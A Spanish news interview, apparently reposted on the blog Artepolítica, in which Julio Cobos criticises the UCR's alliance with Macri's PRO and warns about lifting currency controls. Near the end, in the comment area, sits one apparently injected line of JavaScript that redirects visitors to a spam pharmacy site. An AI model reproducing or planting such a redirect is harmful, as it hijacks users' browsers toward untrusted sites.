Julio Cobos: “No creo que los radicales acompañen a Macri”

El ex gobernador provincial fue crítico de la convención radical y remarcó que el único ganador fue el PRO. Alertó sobre que con el jefe de Gobierno porteño se disparará el dólar y habrá más inflación
Alejandro Gamero
gamero.alejandro@diariouno.net.ar
Vencido el sábado en la Convención Nacional de la Unión Cívica Radical pero aún rápido de reflejos, empezó a vender cara su derrota.
Julio César Cleto Cobos no demoró en retomar el día a día y ayer le disparó el primer misil teledirigido al líder del PRO, Mauricio Macri: “Si libera el cepo cambiario habrá más inflación y se va a disparar el dólar”.
Así, en diálogo con Diario UNO, el diputado nacional por Mendoza torpedeó la promesa pública del jefe de Gobierno de la Ciudad de Buenos Aires, que ayer anticipó que si es presidente eliminará la restricción apenas asuma, el 11 de diciembre.
Incrédulo, Cleto argumentó: “¿Usted cree que si Macri libera el dólar el blue va a bajar al precio oficial de la divisa? ¡Va a ser al revés y habrá más inflación! Esto ya ha pasado”.
Como si todavía estuviera en carrera, no dudó en diferenciarse y apuntó: “Ningún economista opina que hay que hacer esto, los nuestros tampoco. Si fuera tan fácil ya lo hubiera hecho el mismo Gobierno nacional”.
El ataque de Cobos estaba fríamente calculado. Anoche, en su cuenta de Twitter, volvió a insistir en el peligro de que Macri libere la divisa estadounidense.
Entrevistado por UNO, no se guardó nada para criticar la alianza que la UCR decidió poner en marcha con el PRO, y que él intentó evitar sin éxito en la convención de Gualeguay-chú”.
“No creo que los radicales acompañen en las elecciones a Mauricio Macri para que los represente como candidato a presidente”, disparó mientras adelantaba que “va a ser muy difícil que yo lo vote”.
Mirando al partido y su futuro alertó: “Hay un giro evidente hacia la derecha y con esta decisión va a ser muy difícil recuperar la identidad de la UCR”.
Y no dudó en concluir que la decisión del sábado, promovida por el titular de la UCR y precandidato presidencial, Ernesto Sanz, ha significado una contundente derrota para el partido. “Acá hay un solo beneficiado: el PRO. Y un solo perjudicado: el radicalismo”, señaló.
Cuestionó de forma velada la legitimidad de abrirle las puertas en las PASO solo a Mauricio Macri al contar que “muchos dirigentes muy conocidos de la UCR que apoyaron esto tuvieron que irse por la puerta de atrás del teatro en Gualeguaychú”.
Detalló que “afuera estaban la juventud radical y muchísimos militantes que no querían pacto y a los que no dejaron ingresar porque la convención fue cerrada y exclusiva”.
El vicepresidente de la Nación durante el primer mandato de Cristina Fernández de Kirchner explicó que su postura era convocar a todos los que quisieran participar en su partido y en otros, consensuar un programa político común para proponer a la ciudadanía y dar las PASO para que ganara el mejor.
“De esta manera conseguíamos una suma aritmética, porque el voto que se dispersara entre los precandidatos de las primarias se iba a encolumnar en la general detrás del ganador porque el proyecto era uno solo”.
Indicó que, en cambio, “tal como quedan las cosas, no se puede hacer”.
Y ese fue el justificativo para bajarse de la precandidatura presidencial y no darle pelea a Macri.
“No tiene sentido porque tenemos proyectos y posturas diferentes. Yo le gano a Macri en las PASO pero los que lo hayan votado a él no me van a votar a mí en la general porque no es el mismo proyecto y la suma de votos no va a ser aritmética”.
Lamentó que se haya llegado a la convención nacional “divididos, sin acuerdo y sin haber consensuado una propuesta política única”.
Cobos remarcó que fue la culminación de un proceso de desgaste que había empezado con el Frente Amplio UNEN, en donde la UCR era la columna vertebral de la alianza y a la que el propio Macri “hizo todo lo posible para entrar porque no tenía primaria”.
Entonces concluyó: “Al final ganó la estrategia del líder del PRO, que logró entrar a la interna eligiendo a su adversario (Ernesto Sanz y Elisa Carrió) y sin UNEN, lo que dañó mucho la soberanía del radicalismo”.
Dejanos tu comentario

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *